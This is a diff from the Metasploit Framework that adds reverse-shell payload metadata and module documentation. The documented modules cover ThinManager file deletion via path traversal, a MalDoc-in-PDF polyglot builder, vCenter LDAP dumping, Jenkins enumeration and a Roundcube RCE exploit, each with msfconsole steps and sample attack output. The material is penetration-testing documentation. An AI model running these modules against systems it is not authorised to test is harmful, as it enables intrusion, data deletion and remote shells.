+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_perl_ssl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_perl_ssl",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_php_ssl": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP SSL (via php)",
+    "fullname": "payload/php/unix/cmd/reverse_php_ssl",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via php, uses SSL",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_php_ssl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_php_ssl",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_python": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via Python)",
+    "fullname": "payload/php/unix/cmd/reverse_python",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nConnect back and create a command shell via Python",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_python",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_python",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_python_ssl": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP SSL (via python)",
+    "fullname": "payload/php/unix/cmd/reverse_python_ssl",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via python, uses SSL, encodes with base64 by design.",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_python_ssl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_python_ssl",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_r": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via R)",
+    "fullname": "payload/php/unix/cmd/reverse_r",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nConnect back and create a command shell via R",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_r",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_r",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_ruby": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via Ruby)",
+    "fullname": "payload/php/unix/cmd/reverse_ruby",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "kris katterjohn <katterjohn@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nConnect back and create a command shell via Ruby",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_ruby",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_ruby",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_ruby_ssl": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP SSL (via Ruby)",
+    "fullname": "payload/php/unix/cmd/reverse_ruby_ssl",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nConnect back and create a command shell via Ruby, uses SSL",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_ruby_ssl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_ruby_ssl",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_socat_sctp": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse SCTP (via socat)",
+    "fullname": "payload/php/unix/cmd/reverse_socat_sctp",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via socat",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_socat_sctp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_socat_sctp",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_socat_tcp": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via socat)",
+    "fullname": "payload/php/unix/cmd/reverse_socat_tcp",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "jheysel-r7"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via socat",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_socat_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_socat_tcp",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_socat_udp": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse UDP (via socat)",
+    "fullname": "payload/php/unix/cmd/reverse_socat_udp",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via socat",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_socat_udp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_socat_udp",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_ssh": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP SSH",
+    "fullname": "payload/php/unix/cmd/reverse_ssh",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>",
+      "hirura"
+    ],
+    "description": "Execute an OS command from PHP.\n\nConnect back and create a command shell via SSH",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_ssh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_ssh",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_ssl_double_telnet": {
+    "name": "OS Command Exec, Unix Command Shell, Double Reverse TCP SSL (telnet)",
+    "fullname": "payload/php/unix/cmd/reverse_ssl_double_telnet",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell through two inbound connections, encrypts using SSL via \"-z\" option",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_ssl_double_telnet",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_ssl_double_telnet",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_stub": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (stub)",
+    "fullname": "payload/php/unix/cmd/reverse_stub",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell through an inbound connection (stub only, no payload)",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_stub",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_stub",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_tclsh": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via Tclsh)",
+    "fullname": "payload/php/unix/cmd/reverse_tclsh",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via Tclsh",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_tclsh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_tclsh",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_zsh": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via Zsh)",
+    "fullname": "payload/php/unix/cmd/reverse_zsh",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Doug Prostko <dougtko@gmail.com>",
+      "Wang Yihang <wangyihanger@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nConnect back and create a command shell via Zsh.  Note: Although Zsh is often\navailable, please be aware it isn't usually installed by default.",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_zsh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_zsh",
+    "staged": false
+  },
  "payload_python/exec": {
    "name": "Python Execute Command",
    "fullname": "payload/python/exec",
@@ -0,0 +1,55 @@
+## Vulnerable Application
+
+This module exploits a path traversal vulnerability in ThinManager <= v13.1.0 (CVE-2023-2915) to delete an arbitrary file from the
+system.
+
+The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://thinmanager.com/downloads/).
+
+**Successfully tested on**
+
+- ThinManager v13.1.0 on Windows 22H2
+- ThinManager v13.0.1 on Windows 22H2
+- ThinManager v13.0.0 on Windows 22H2
+- ThinManager v12.1.5 on Windows 22H2
+- ThinManager v10.0.2 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/gather/thinmanager_traversal_delete
+msf6 auxiliary(gather/thinmanager_traversal_delete) > set RHOSTS <IP>
+msf6 auxiliary(gather/thinmanager_traversal_delete) > set FILE <file to delete>
+msf6 auxiliary(gather/thinmanager_traversal_delete) > run
+```
+
+This should delete the file as specified through FILE from the remote server.
+
+## Options
+
+### FILE
+The file to delete from the remote server.
+
+## Scenarios
+
+Running the exploit against ThinManager v13.0.1 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(gather/thinmanager_traversal_delete) > run
+[*] Running module against 192.168.137.229
+
+[*] 192.168.137.229:2031 - Running automatic check ("set AutoCheck false" to disable)
+[!] 192.168.137.229:2031 - The service is running, but could not be validated.
+[*] 192.168.137.229:2031 - Sending handshake...
+[*] 192.168.137.229:2031 - Received handshake response.
+[*] 192.168.137.229:2031 - Deleting /Windows/win.ini from 192.168.137.229
+[+] 192.168.137.229:2031 - Received response from target.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,101 @@
+## Vulnerable Application
+
+The technique is called "MalDoc in PDF". This technique hides malicious Word documents in PDF files,
+which is why malicious code contained in them cannot be detected by many analysis tools.
+
+The document can be opened in both Microsoft Word and a PDF reader.
+
+However, for the macro to run, you must open this document in Microsoft Word. The attack does not bypass
+configured macro locks. The malicious macros are also not executed when the file is opened in PDF readers
+or similar software.
+
+### Introduction
+
+A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file
+structure of PDF.
+
+If the file has configured macro, by opening it in Microsoft Word, VBS runs and performs malicious behaviors.
+
+## For Testing
+
+You create a `Single File Web Page (*.mht, *.mhtml)` file containing a VBS macro. For testing, you can use the
+following macro:
+
+```
+Sub AutoOpen()
+   MsgBox "Macro executed successfully!", vbInformation, "Information"
+End Sub
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `auxiliary/fileformat/maldoc_in_pdf_polyglot`
+3. Do: `set FILENAME /tmp/macro.htm`
+4. Do: `run`
+
+## Options
+
+### FILENAME
+
+The input MHT filename with macro embedded.
+
+### INJECTED_PDF
+
+The input PDF filename to be injected. (optional)
+
+### MESSAGE_PDF
+
+The message to display in the local PDF template (if INJECTED_PDF is NOT used). Default: You must open this document in Microsoft Word
+
+## Scenarios
+
+### Create without PDF template
+
+```
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > options 
+
+Module options (auxiliary/fileformat/maldoc_in_pdf_polyglot):
+
+   Name          Current Setting                                Required  Description
+   ----          ---------------                                --------  -----------
+   FILENAME      /tmp/macro.mht                                 yes       The input MHT filename with macro embedded
+   INJECTED_PDF                                                 no        The input PDF filename to be injected (optional)
+   MESSAGE_PDF   You must open this document in Microsoft Word  no        The message to display in the local PDF template (if INJECTED_PDF is NOT used)
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > run
+[*] PDF creation using local template
+[+] The file 'macro.doc' is stored at '/home/mekhalleh/.msf4/local/macro.doc'
+[*] Auxiliary module execution completed
+```
+
+### Create using PDF template
+
+```
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > options 
+
+Module options (auxiliary/fileformat/maldoc_in_pdf_polyglot):
+
+   Name          Current Setting                                Required  Description
+   ----          ---------------                                --------  -----------
+   FILENAME      /tmp/macro.mht                                 yes       The input MHT filename with macro embedded
+   INJECTED_PDF  /tmp/injected.pdf                              no        The input PDF filename to be injected (optional)
+   MESSAGE_PDF   You must open this document in Microsoft Word  no        The message to display in the local PDF template (if INJECTED_PDF is NOT used)
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > run
+[*] PDF creation using 'injected.pdf' as template
+[+] The file 'macro.doc' is stored at '/home/mekhalleh/.msf4/local/macro.doc'
+[*] Auxiliary module execution completed
+```
+
+## References
+
+1. <https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html>
+2. <https://socradar.io/maldoc-in-pdf-a-novel-method-to-distribute-malicious-macros/>
+3. <https://www.nospamproxy.de/en/maldoc-in-pdf-danger-from-word-files-hidden-in-pdfs/>
+4. <https://github.com/exa-offsec/maldoc_in_pdf_polyglot/tree/main/demo>
@@ -6,7 +6,7 @@ This module uses an anonymous-bind LDAP connection to dump data from
 the vmdir service in VMware vCenter Server version 6.7 prior to the
 6.7U3f update, only if upgraded from a previous release line, such as
 6.0 or 6.5.
-If the bind username and password are provided (BIND_DN and BIND_PW
+If the bind username and password are provided (BIND_DN and LDAPPassword
 options), these credentials will be used instead of attempting an
 anonymous bind.

@@ -36,18 +36,33 @@ If you already have the LDAP base DN, you may set it in this option.
 ### VMware vCenter Server 6.7 virtual appliance on ESXi

 ```
-msf5 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
-msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options
+msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show options

-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   BASE_DN                    no        LDAP base DN if you already have it
-   DOMAIN                     no        The domain to authenticate to
-   PASSWORD                   no        The password to authenticate with
-   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT     636              yes       The target port
-   SSL       true             no        Enable SSL on the LDAP connection
-   USERNAME                   no        The username to authenticate with
+Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   BASE_DN                   no        LDAP base DN if you already have it
+   SSL      true             no        Enable SSL on the LDAP connection
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LDAPDomain                     no        The domain to authenticate to
+   LDAPPassword                   no        The password to authenticate with
+   LDAPUsername                   no        The username to authenticate with
+   RHOSTS                         no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                            metasploit.html
+   RPORT         636              no        The target port


 Auxiliary action:
@@ -57,6 +72,8 @@ Auxiliary action:
   Dump  Dump all LDAP data


+
+View the full module info with the info, or info -d command.
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted]
 rhosts => [redacted]
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run
@@ -0,0 +1,72 @@
+# Jenkins Enumeration Auxiliary Module
+
+## Vulnerable Application
+This module performs unauthenticated enumeration on Jenkins servers. It attempts to discover the Jenkins version, identify unauthenticated accessible endpoints, and gather useful system information when possible.
+
+Jenkins servers that do not enforce strict authentication on certain URLs (such as `/script`) are susceptible to this enumeration. This module helps penetration testers quickly identify such information leakage.
+Jenkins instances may expose sensitive information through misconfigured endpoints. Many companies unintentionally leave URLs like /script and /manage open without authentication, allowing attackers to retrieve system details. If these endpoints return data, it’s a sign that authentication settings might need to be tightened.
+
+
+## Verification Steps
+1. Start `msfconsole`
+2. Use the module: `use auxiliary/scanner/http/jenkins_enum`
+3. Set the target(s) and other options: `set RHOSTS <target IP or CIDR>`, `set RPORT 8080`, `set TARGETURI /jenkins/`, etc
+4. Run the module: `run`
+5. You might see output similar to:
+
+``` 
+[+] 192.168.1.100:8080 - Jenkins Version: 2.319.1
+[+] 192.168.1.100:8080 - /script is accessible without authentication (HTTP 200)
+[+] 192.168.1.100:8080 - Enumerating plugins...
+[+] 192.168.1.100:8080 - Plugin detected: Git Plugin 4.11.3
+[+] 192.168.1.100:8080 - System Information:
+    OS: Linux
+    OS Version: 5.4.0-77-generic
+    Architecture: amd64
+    Jenkins Home: /var/lib/jenkins
+[*] 192.168.1.100:8080 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+## Options
+
+### RHOSTS
+Specifies the target host(s) or IP range to scan. You can input a single IP address, a range, or a CIDR subnet.
+Default: None (required)
+
+### RPORT
+Defines the target port for HTTP connections. Jenkins often runs on port 8080, but the default for this module is 80. Adjust accordingly.
+Default: 80
+
+### TARGETURI
+The base path of the Jenkins application on the target server. Usually /jenkins/ but can differ based on installation or proxy setup.
+Default: /jenkins/
+
+### THREADS
+The number of concurrent threads to use for faster scanning. Increasing this number can speed up scans but may generate more network traffic or load on the target.
+Default: 1
+
+### VHOST
+Specify a virtual host name for the HTTP Host header if Jenkins is running behind a virtual host or reverse proxy.
+Default: None
+
+## Scenarios
+This example demonstrates how to use the jenkins_enum module to enumerate information from a Jenkins server running on the local network at IP 192.168.1.100 on port 8080, where Jenkins is installed at the default /jenkins/ path.
+
+```
+msf6 > use auxiliary/scanner/http/jenkins_enum
+msf6 auxiliary(scanner/http/jenkins_enum) > set RHOSTS 192.168.1.100
+msf6 auxiliary(scanner/http/jenkins_enum) > set RPORT 8080
+msf6 auxiliary(scanner/http/jenkins_enum) > set TARGETURI /jenkins/
+msf6 auxiliary(scanner/http/jenkins_enum) > run
+
+[*] 192.168.1.100:8080 - Jenkins Version: 2.319.1
+[+] 192.168.1.100:8080 - /script is accessible without authentication (HTTP 200)
+[*] 192.168.1.100:8080 - Enumerating plugins...
+[+] 192.168.1.100:8080 - Plugin detected: Git Plugin 4.11.3
+[+] 192.168.1.100:8080 - Plugin detected: Matrix Authorization Strategy 2.6.7
+[+] 192.168.1.100:8080 - Plugin detected: Workflow CPS 2.92
+[*] 192.168.1.100:8080 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+The module retrieves the Jenkins version and installed plugins without requiring credentials, which can help identify vulnerable plugin versions or configuration weaknesses.
@@ -0,0 +1,147 @@
+## Vulnerable Application
+  This module exploits an authenticated remote code execution vulnerability via a file upload
+  endpoint. The vulnerability stems from improper validation of the uploaded filename, which is
+  deserialized on the server side without sufficient sanitization. By embedding a PHP serialization
+  gadget chain in the filename, an attacker can achieve remote code execution.
+
+  This issue is tracked as CVE-2025-49113. Exploitation results in code execution as the web server
+  user.
+
+## Testing
+To set up a test environment:
+1. Set up an Roundcube.
+
+Create File
+`docker-compose.xml`
+```
+version: '3'
+
+services:
+  db:
+    image: mariadb:10.5
+    restart: always
+    environment:
+      MYSQL_ROOT_PASSWORD: example_root_pass
+      MYSQL_DATABASE: roundcube
+      MYSQL_USER: roundcube_user
+      MYSQL_PASSWORD: roundcube_pass
+    volumes:
+      - db_data:/var/lib/mysql
+
+  roundcube:
+    image: roundcube/roundcubemail:1.5.9-apache
+    depends_on:
+      - db
+    ports:
+      - "8080:80"
+    environment:
+      ROUNDCUBEMAIL_DEFAULT_HOST: <ROUNDCUBEMAIL_DEFAULT_HOST>
+      ROUNDCUBEMAIL_SMTP_SERVER: <ROUNDCUBEMAIL_SMTP_SERVER>
+      ROUNDCUBEMAIL_SMTP_PORT: 587
+      ROUNDCUBEMAIL_SMTP_USER: <ROUNDCUBEMAIL_SMTP_USER>
+      ROUNDCUBEMAIL_SMTP_PASS: <ROUNDCUBEMAIL_SMTP_PASS>
+      ROUNDCUBEMAIL_DES_KEY: randomstring
+      ROUNDCUBEMAIL_DB_TYPE: mysql
+      ROUNDCUBEMAIL_DB_HOST: db
+      ROUNDCUBEMAIL_DB_USER: roundcube_user
+      ROUNDCUBEMAIL_DB_PASSWORD: roundcube_pass
+      ROUNDCUBEMAIL_DB_NAME: roundcube
+
+volumes:
+  db_data:
+```
+
+Execute
+
+`docker compose up`
+
+2. Configure basic networking and confirm that the web service on port 8080 is reachable.
+3. Follow the verification steps below.
+
+## Options
+No custom options exist for this module.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/multi/http/roundcube_unauth_rce_cve_2025_49113`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set LHOST <LOCAL_IP>`
+6. `set LPORT <LOCAL_PORT>`
+7. `set USERNAME <USERNAME_TO_LOGIN_WITH>`
+8. `set PASSWORD <PASSWORD_TO_LOGIN_WITH>`
+9. `run`
+
+## Scenarios
+### Roundcube Linux Target
+```
+msf6 exploit(multi/http/roundcube_unauth_rce_cve_2025_49113) > show options
+
+Module options (exploit/multi/http/roundcube_unauth_rce_cve_2025_49113):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   HOST                        no        The hostname of Roundcube server
+   PASSWORD                    yes       Password to login with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      9999             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The URI of the Roundcube Application
+   TIMEOUT    3                no        Time to wait for session (in seconds)
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME                    yes       Email User to login with
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
